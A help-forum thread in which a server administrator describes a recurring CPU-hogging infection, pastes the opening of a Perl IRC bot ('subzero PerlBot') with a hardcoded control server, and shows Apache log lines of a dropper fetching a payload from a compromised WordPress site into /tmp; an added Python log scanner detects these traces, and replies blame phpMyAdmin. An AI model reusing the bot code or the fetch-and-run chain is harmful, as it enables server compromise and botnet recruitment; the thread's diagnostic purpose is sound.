Hello everyone.
I'm no Linux expert, but I've dabbled a bit. I have a server hosting 8 websites, a cross/historical backup service, downloads, etc.
Right now it's running Lucid 10.04 64-bit, but before that it was on 8.04 (I think), on a Q6600 (4 cores).
The problem is that a few months after the reinstall the cores start saturating at 100% (first one, an hour later another, etc.) until the system hangs. I investigated and it turned out to be a perl process running a temporary file "a" in the /temp folder.
That file is a virus:
#!/usr/bin/perl
# ----------------------------------------------------------- #
# subzero PerlBot v4.5 #
# Fuck Off All #
# ----------------------------------------------------------- #
system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
my $processo = '-';
my @titi = ("index.php?page=","main.php?page=");
my $goni = $titi[rand scalar @titi];
my $linas_max='3';
my $sleep='7';
my @adms=("daemon");
my @hostauth=("localhost");
my @canais=("#perl");
chop (my $nick = `uname`);
chop (my $ircname = `whoami`);
chop (my $realname = `uname -sr`);
$servidor='67.19.105.66' unless $servidor;
my $porta='8080';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
....................... and much more
The code is quite a bit longer, but I'm not pasting it all here so as not to make this too long.
In the log you can see when the virus gets downloaded:
rm: cannot remove directory `/var/tmp/php': Permission denied
rm: cannot remove `.' directory `/var/tmp/.'
rm: cannot remove `..' directory `/var/tmp/..'
rm: cannot remove directory `/tmp/hsperfdata_curro': Operation not permitted
rm: cannot remove `/tmp/keyring-dLSdYd': Permission denied
rm: cannot remove `/tmp/libgksu-Fgav45': Permission denied
rm: cannot remove `/tmp/orbit-curro': Permission denied
rm: cannot remove `/tmp/orbit-root': Permission denied
rm: cannot remove `/tmp/pulse-Eci2r46O5MC3': Permission denied
rm: cannot remove `/tmp/ssh-iSsPhB1296': Permission denied
rm: cannot remove `/tmp/virtual-curro.k2sgkA': Permission denied
rm: cannot remove `.' directory `/tmp/.'
rm: cannot remove `..' directory `/tmp/..'
rm: cannot remove `/tmp/.ICE-unix/1296': Operation not permitted
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
rm: cannot remove `/tmp/.X11-unix/X0': Operation not permitted
rm: cannot remove `/tmp/.esd-1000': Permission denied
rm: cannot remove `/tmp/.vbox-curro-ipc': Permission denied
rm: cannot remove directory `/tmp/.webmin': Operation not permitted
rm: cannot remove `/tmp/.winbindd/pipe': Permission denied
rm: cannot remove `/dev/shm/pulse-shm-1257430352': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1668825862': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1733714244': Operation not permitted
rm: cannot remove `.' directory `/dev/shm/.'
rm: cannot remove `..' directory `/dev/shm/..'
rm: cannot remove `/usr/games/gbrainy': Permission denied
rm: cannot remove `/usr/games/gnome-sudoku': Permission denied
rm: cannot remove `/usr/games/gnomine': Permission denied
rm: cannot remove `/usr/games/mahjongg': Permission denied
rm: cannot remove `/usr/games/quadrapassel': Permission denied
rm: cannot remove `/usr/games/sol': Permission denied
rm: cannot remove `.' directory `/usr/games/.'
rm: cannot remove `..' directory `/usr/games/..'
perl: no process found
--2012-01-13 15:39:32-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `c.txt'
0K .......... ..... 100% 48.6K=0.3s
2012-01-13 15:39:35 (48.6 KB/s) - `c.txt' saved [16241/16241]
sh: curl: not found
sh: fetch: not found
sh: lynx: not found
--2012-01-13 15:39:36-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `/tmp/p'
0K .......... ..... 100% 53.7K=0.3s
2012-01-13 15:39:38 (53.7 KB/s) - `/tmp/p' saved [16241/16241]
--2012-01-13 15:39:38-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
c.txt: Permission denied
Cannot write to `c.txt' (Permission denied).
sh: curl: not found
sh: cannot create a: Permission denied
sh: cannot create b: Permission denied
sh: lynx: not found
/var/tmp/p: Permission denied
Can't open perl script "c.txt": No such file or directory
Can't open perl script "/var/tmp/c.txt": No such file or directory
Can't open perl script "a": No such file or directory
Can't open perl script "p": No such file or directory
Can't open perl script "b": No such file or directory
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
[Fri Jan 13 21:42:17 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
[Fri Jan 13 21:42:18 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
rm: cannot remove directory `/var/tmp/php': Permission denied
rm: cannot remove `.' directory `/var/tmp/.'
rm: cannot remove `..' directory `/var/tmp/..'
rm: cannot remove `/tmp/gedit.curro.4044826546': Operation not permitted
rm: cannot remove `/tmp/gnome-system-monitor.curro.3986015880': Operation not permitted
rm: cannot remove directory `/tmp/hsperfdata_curro': Operation not permitted
rm: cannot remove `/tmp/keyring-dLSdYd': Permission denied
rm: cannot remove `/tmp/libgksu-WASEJH': Permission denied
rm: cannot remove `/tmp/orbit-curro': Permission denied
rm: cannot remove `/tmp/orbit-root': Permission denied
rm: cannot remove `/tmp/pulse-Eci2r46O5MC3': Permission denied
rm: cannot remove `/tmp/ssh-iSsPhB1296': Permission denied
rm: cannot remove `/tmp/virtual-curro.k2sgkA': Permission denied
rm: cannot remove `.' directory `/tmp/.'
rm: cannot remove `..' directory `/tmp/..'
rm: cannot remove `/tmp/.ICE-unix/1296': Operation not permitted
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
rm: cannot remove `/tmp/.X11-unix/X0': Operation not permitted
rm: cannot remove `/tmp/.esd-1000': Permission denied
rm: cannot remove `/tmp/.vbox-curro-ipc': Permission denied
rm: cannot remove directory `/tmp/.webmin': Operation not permitted
rm: cannot remove `/tmp/.winbindd/pipe': Permission denied
rm: cannot remove `/dev/shm/pulse-shm-1257430352': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1668825862': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1733714244': Operation not permitted
rm: cannot remove `.' directory `/dev/shm/.'
rm: cannot remove `..' directory `/dev/shm/..'
rm: cannot remove `/usr/games/gbrainy': Permission denied
rm: cannot remove `/usr/games/gnome-sudoku': Permission denied
rm: cannot remove `/usr/games/gnomine': Permission denied
rm: cannot remove `/usr/games/mahjongg': Permission denied
rm: cannot remove `/usr/games/quadrapassel': Permission denied
rm: cannot remove `/usr/games/sol': Permission denied
rm: cannot remove `.' directory `/usr/games/.'
rm: cannot remove `..' directory `/usr/games/..'
perl: no process found
--2012-01-13 21:42:38-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `c.txt'
0K .......... ..... 100% 37.1K=0.4s
2012-01-13 21:42:42 (37.1 KB/s) - `c.txt' saved [16241/16241]
sh: curl: not found
sh: fetch: not found
sh: lynx: not found
--2012-01-13 21:42:44-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `/tmp/p'
0K .......... ..... 100% 51.6K=0.3s
2012-01-13 21:42:45 (51.6 KB/s) - `/tmp/p' saved [16241/16241]
--2012-01-13 21:42:45-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
c.txt: Permission denied
Cannot write to `c.txt' (Permission denied).
sh: curl: not found
sh: cannot create a: Permission denied
sh: cannot create b: Permission denied
sh: lynx: not found
/var/tmp/p: Permission denied
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
Can't open perl script "c.txt": No such file or directory
Can't open perl script "/var/tmp/c.txt": No such file or directory
Can't open perl script "a": No such file or directory
Can't open perl script "p": No such file or directory
Can't open perl script "b": No such file or directory
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
The perl process is this one:
http://img841.imageshack.us/img841/8478/cuelgue1.jpg
Process information
Command: -
Process ID: 25408
Parent process: /sbin/init
Owner: www-data
CPU: 99.9 %
Size: 22968 kB
Run time: 09:34:19
Nice level: (none shown)
IO scheduling class: (none shown)
IO priority: (none shown)
Real group: www-data
Process group ID: 1539
Group: www-data
TTY: None
Started: 00:42
Real user: www-data
and these are the files it has open:
http://img823.imageshack.us/img823/1407/cuelgue2.jpg
For process - (PID 25408)
Open files (file descriptor, type, file size, inode, path):
Current directory: directory 4096 1835009 /tmp
Root directory: directory 2 /
Program code: regular file 10416 1847282 /usr/bin/perl
Shared library: regular file 27032 2103551 /usr/lib/perl/5.10.1/auto/Socket/Socket.so
Shared library: regular file 22904 2103779 /usr/lib/perl/5.10.1/auto/IO/IO.so
Shared library: regular file 43296 1972107 /lib/libcrypt-2.11.1.so
Shared library: regular file 1572232 1966281 /lib/libc-2.11.1.so
Shared library: regular file 135745 1966364 /lib/libpthread-2.11.1.so
Shared library: regular file 534832 1972135 /lib/libm-2.11.1.so
Shared library: regular file 14696 1972139 /lib/libdl-2.11.1.so
Shared library: regular file 1487368 1718887 /usr/lib/libperl.so.5.10.1
Shared library: regular file 136936 1968483 /lib/ld-2.11.1.so
2w: regular file 1383104 662674 /var/log/apache2/error.log
Open network connections (type, protocol, file descriptor, details):
IPV4 TCP 3u 150.1.30.222:47320 -> 81.219.176.123:http-alt ESTABLISHED
IPV4 TCP 11u 150.1.30.222:59877 -> 193.27.78.88:http-alt CLOSE_WAIT
I've already run Rkhunter and everything checks out.
Curious facts:
- The same thing happened to me with 8.04 32-bit and 10.04 64-bit; the install was completely fresh, although the websites and database were kept.
- The task gets installed in cron every second and the creator is www-data. I've configured cron so that only root can add new tasks, and yet the rogue task keeps showing up even after I delete it. When I try to disable it, it won't let me because the owner is www-data (odd, because even though only root can create them, it still shows up, though I can't modify it), so I delete it.
As soon as it shows up again I'll paste the task here.
My suspicion is that it's coming in through an Apache vulnerability with WordPress. So for now I've moved all the websites to another server and left only one, to work out which website it is by elimination.
In any case, any suggestion is welcome.
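An added detection example (not code from the original post) that walks Apache error-log lines for the dropper traces visible above: a file saved into /tmp or /var/tmp, the shell probing for curl/fetch/lynx, perl invoked on the dropped file, and the rm and kill storms. The sample lines and their URL are constructed.

```python
# Added example (not from the original post): flag the /tmp perl-dropper
# traces seen in the thread's Apache error log. Sample lines are constructed.
import re
from collections import Counter

# (indicator name, regex); first match wins, so the specific ones come first.
INDICATORS = [
    ("download_to_tmp", re.compile(r"Saving to: `(?:/var)?/tmp/[^']*'")),
    ("fetch_url", re.compile(r"^--\d{4}-\d\d-\d\d \d\d:\d\d:\d\d--\s+(\S+)")),
    ("fallback_downloader", re.compile(r"^sh: (?:curl|fetch|lynx): not found")),
    ("perl_script_exec", re.compile(r"^Can't open perl script")),
    ("rm_storm", re.compile(r"^rm: cannot remove")),
    ("kill_usage", re.compile(r"^kill: \d+: Usage: kill")),
]
FETCH_RX = INDICATORS[1][1]

# Constructed sample shaped like the log in the thread (placeholder URL).
SAMPLE_LOG = """\
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
perl: no process found
--2012-01-13 15:39:36--  http://compromised.example/cache/c.txt
Saving to: `/tmp/p'
sh: curl: not found
sh: lynx: not found
Can't open perl script "a": No such file or directory
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
[Fri Jan 13 21:42:17 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
""".splitlines()

def classify_line(line):
    """Return the name of the first indicator the line matches, or None."""
    for name, rx in INDICATORS:
        if rx.search(line):
            return name
    return None

def scan_error_log(lines):
    """Count indicators, collect fetched URLs and decide whether a dropper ran.

    A run needs both a payload saved into a temp dir and perl invoked on a
    script; an rm storm or a missing-curl message alone is too weak a signal.
    """
    counts = Counter()
    urls = set()
    for line in lines:
        name = classify_line(line)
        if name is None:
            continue
        counts[name] += 1
        if name == "fetch_url":
            urls.add(FETCH_RX.search(line).group(1))
    run = {"download_to_tmp", "perl_script_exec"} <= set(counts)
    return {"counts": dict(counts), "urls": sorted(urls), "dropper_run": run}
```

Run it over /var/log/apache2/error.log with scan_error_log(open(path)) and use the collected URLs to find which site or plugin directory is serving the payload.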

SOLVED
Well, I started removing services and testing, and I found it was a vulnerability in phpadmin. I disabled it and that was it; the PC hasn't hung since I did that (more than two months), no more attacks, no hangs, absolute stability.
Apparently they were attacking the phpadmin password or some vulnerability, until they got in and from there attacked my websites.
So, as a recommendation: don't use phpadmin, or keep it disabled until you need it.
Ubuntu 8.10
Thanks for commenting, I'll look into the phpadmin thing...
Do you mean phpmyadmin??
Thanks, if so I'll move the link from var/www to another location so it can't be used, and when it's needed, as you say, I'll move it back to its place, do what I need and change it back again.
Regards and thanks.
If I go into Window$ I'm more tense than at a gremlin's baptism.
Linux user: 545.017
Please, if you solve the thread, add [Solucionado] to the title.
phpmyadmin
Yes, sorry, I lost the plot, phpmyadmin.
I've updated to a more recent version; according to its developers there's a major security flaw in versions 3.3.0 through 3.4.3.2 that allows obtaining root capabilities.
For now I've updated phpmyadmin because it was below 3.3.0 :S Thanks for the heads-up; it wouldn't have crossed my mind that, with the distribution up to date, it could have a vulnerable version...
Thanks again.